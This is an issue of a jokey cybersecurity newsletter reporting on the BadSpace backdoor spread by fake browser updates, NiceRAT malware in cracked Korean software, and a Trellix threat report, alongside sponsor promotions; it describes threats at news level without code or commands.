Malware via Fake Browser Updates

Jun 18 2024

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter that’s the Romania to cybercrime’s Ukraine 💀💀💀 #EURO2024

Today’s hottest cybersecurity news stories:

  • 🌌 BadSpace Windows backdoor delivered via legit websites 🎭

  • 🍜. South Korea targeted with NiceRAT via Cracked software 💔

  • 😈 Electorate tricked by fake campaign emails soliciting donations 💸

Hackers: You have to take the good with the BadSpace 💀💀💀

Comedy You Are Fake GIF by Run The Burbs

Gif by runtheburbs on Giphy

🚨⚠️ Fake Browser Updates Deliver Malware! 🔍🖥️

Compromised Websites Spread BadSpace! 📦💀 Legitimate-but-compromised websites are being exploited to deliver a Windows backdoor named BadSpace, disguised as fake browser updates. German cybersecurity firm G DATA uncovered this deceptive scheme.

How It Works 🎭🔗

  1. Infected Website: The attack starts with a compromised site, often built on WordPress, injecting malicious code.

  2. First Visit Logic: If it's a user's first visit, the site collects device info, IP address, user-agent, and location, sending it to a hard-coded domain.

  3. Fake Update: The site displays a fake Google Chrome update pop-up, either dropping the malware directly or through a JavaScript downloader.

  4. C2 Server Connection: The server involved is linked to SocGholish (aka FakeUpdates), a known JavaScript-based downloader.

BadSpace Capabilities 🔍⚙️

  • Anti-Sandbox Checks: Evades detection.

  • Persistence: Sets up scheduled tasks.

  • Data Harvesting: Collects system info.

  • Command Execution: Runs commands via cmd.exe, reads/writes files, takes screenshots, and deletes scheduled tasks.

Recent Warnings 🛡️🔔

eSentire and Sucuri have also reported campaigns using fake browser update lures to distribute information stealers and remote access trojans. Be cautious of unexpected browser update prompts!

Stay alert and safeguard your systems! 🌐🔐

NiceRAT attack Cracks the Korean code 🐀🐀🐀

🚨 Malware Alert: NiceRAT Targeting South Korea! 🖥️

Cracked Software Spreading NiceRAT! 🚨📦 Threat actors are deploying a malware called NiceRAT to turn infected devices into a botnet. South Korean users are targeted through cracked software like Microsoft Windows or tools for Microsoft Office licence verification.

Sneaky Distribution Methods 🕵️‍♂️🎛️

AhnLab Security Intelligence Center (ASEC) reports that:

  • User Sharing: Crack programs shared among users spread the malware beyond the initial distributor.

  • Anti-Malware Removal Tips: Threat actors guide users on removing anti-malware, making detection difficult.

Botnet Distribution 📲🦠

In addition to cracked software, NiceRAT spreads via a botnet of zombie computers infiltrated by NanoCore RAT. This mirrors previous methods using Nitol DDoS malware to propagate Amadey Bot.

NiceRAT Capabilities and Development 🔍⚙️

  • Active Development: Open-source, written in Python.

  • Command-and-Control: Uses Discord Webhook.

  • Sensitive Data Theft: Steals information from compromised hosts.

  • Versions: First released on April 17, 2024, now at version 1.1.0.

  • MaaS Model: Available as a premium version, indicating a Malware-as-a-Service offering.

Related Threats 🚨⛏️

Bondnet Botnet: A cryptocurrency mining botnet using high-performance miner bots as C2 servers since 2023, leveraging a modified Fast Reverse Proxy (FRP) tool.

Stay vigilant against unexpected software updates and always use trusted sources for downloads! 🌐🔐

🎣 Catch of the Day!! 🌊🐟🦞

Stay ahead of the curve with! 🚀 Subscribe to their newsletter for the latest buzz in the information technology space, with a special focus on AI. Their slogan says it all: "Actionable marketing insights for the visionary AI executive." 🤓💡 That’s us, alright! 🤵 How about you? Visionary AI executive, much? 👀

And if the newsletter gets your motor running then you can take a butchers at their cool AI marketing product too which is sure to help you make the most of our new artificial overlords and put them to work for your business 🤖👩‍💻🌐

Rest assured, the process is very straightforward.

You simply:

🆕 Sign Up & Create Campaign

📊 Define your audience, budget, and message to captivate your audience.

🚀 Launch your campaign, as Presspool’s AI matches it with ideal newsletter audiences for optimal reach and conversions. 🎯

🕵️ Finally, you leverage real-time analytics to track performance and refine future strategies. 📈 Elevate your marketing game and stay informed with! 🌟 Simples! 🦦 📰🏊🤖 may just have what you need to succeed. And if the product isn’t for you, the newsletter alone is a gamechanger. And we know newsletters 😉

Poll up, poll up! Read all about it 🗳️🗳️🗳️

🚨⚠️ Global Cyber Threat Surge! 🌍💻

Major Events Fuel Cyber Attacks! 📈🔍 Major regional and global events, including military exercises, political summits, and elections, have driven a surge in cyber threat activities, according to Trellix.

Cyber Threat Landscape 🌏🔥

John Fokker, Head of Threat Intelligence at Trellix, highlighted a “state of polycrisis” over the last six months, with radical shifts in cybercriminal behaviour. He emphasised the increasing complexity of cybersecurity and the need for operational threat intelligence to outpace cybercriminals.

China & Russia Lead Cyber Attacks 🏴‍☠

  • China: Volt Typhoon and other China-linked groups dominate APT activities, accounting for 68.3% of detections. 23% of their activity targets the global government sector.

  • Russia: Sandworm APT group saw a 40% increase in activity compared to the previous period.

  • Iran: Marked an 8% rise in cyber activities, aligned with geopolitical aims, including the Israeli-Hamas conflict.

Election Scams & Ransomware 🚨💸

  • Election Scams: Malicious emails trick consumers into donating to fake election campaigns using legitimate marketing services.

  • Ransomware: Transportation and shipping sectors faced the highest ransomware threat, with 53% and 45% of global detections in Q4 2023 and Q1 2024 respectively. The finance industry followed closely. Post-LockBit disruption, imposters emerged copying the group.

GenAI & Advanced Tools 🧠🔧

  • Cobalt Strike: Remains popular despite a 17% decrease in detections.

  • Terminator Tool: Used by Spyboy in January 2024, targeting the telecom sector, likely linked to the Russian-Ukrainian conflict.

  • GenAI Adoption: Free ChatGPT 4.0 Jabber tool helps cybercriminals incorporate GenAI, creating a knowledge base for learning and idea theft.

Geopolitical Motivations & Tool Shifts 🌐🔄

The dramatic increase in APT activities in certain countries reflects geopolitical motivations. The rise in “living off the land” tactics emphasises the challenge of distinguishing between legitimate and malicious activities.

Stay alert and informed to navigate these evolving cyber threats! 🔐🌍

🗞️ Extra, Extra! Read all about it! 🗞️

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵 Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈 Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

Recent articles